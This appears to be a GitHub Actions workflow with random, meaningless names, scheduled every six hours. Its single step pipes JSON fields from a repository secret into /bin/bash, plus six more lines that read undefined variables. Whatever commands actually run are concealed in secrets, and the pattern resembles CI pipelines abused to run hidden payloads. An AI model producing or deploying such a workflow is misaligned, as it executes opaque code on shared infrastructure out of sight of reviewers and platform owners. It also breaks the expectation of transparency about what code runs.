name: lanjingtian5614

on:
  workflow_dispatch:
  schedule:
    - cron: '14 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lanjingtian5614
        env:
          j137: ${{ secrets.j137 }}
        run: |
          echo $j137 | jq -r .tsij54 | /bin/bash
          echo $oh17 | jq -r .lo3649 | /bin/bash
          echo $kdi49082 | jq -r .b086 | /bin/bash
          echo $sph6131 | jq -r .a7 | /bin/bash
          echo $iodtw99 | jq -r .ei10 | /bin/bash
          echo $s284 | jq -r .lf21 | /bin/bash
          echo $npr8151 | jq -r .vug91 | /bin/bash

